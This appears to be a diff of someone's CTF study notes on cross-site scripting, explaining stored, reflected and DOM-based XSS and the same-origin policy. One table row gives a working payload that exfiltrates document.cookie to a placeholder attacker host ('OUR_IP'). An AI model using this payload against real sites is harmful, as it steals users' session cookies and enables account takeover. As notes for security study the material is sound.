Jacob-CL/CTFNotes/Methods/XXS-CSRF.md

 | Send Cookie details to us | `<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>` |

 # Notes

+## Stored XSS
+Most critical where the injected XSS payload gets stored in the back-end database and retrieved upon visiting the page, this means that our XSS attack is persistent and may affect any user that visits the page.

+## Reflected XSS (Not stored)
+2 types, both non-persistent:
+- `Reflected` payload gets processed by the back-end server - server-side vulnerability
+- `DOM-based XSS` payload is completely processed on the client-side and never reaches the back-end server.
+Nothing in the network tab - therefore client-side vulnerabiltiy.

+### Difference between the two

 ## Same-Origin Policy (SOP)
 Tries to set boundaries by preventing one origin (website) from accessing resources from another origin.
 A different origin is defined by something that has a different protocol (`http` vs `https`), domain (`example.com` vs `google.com`) and port (`80` vs `443`)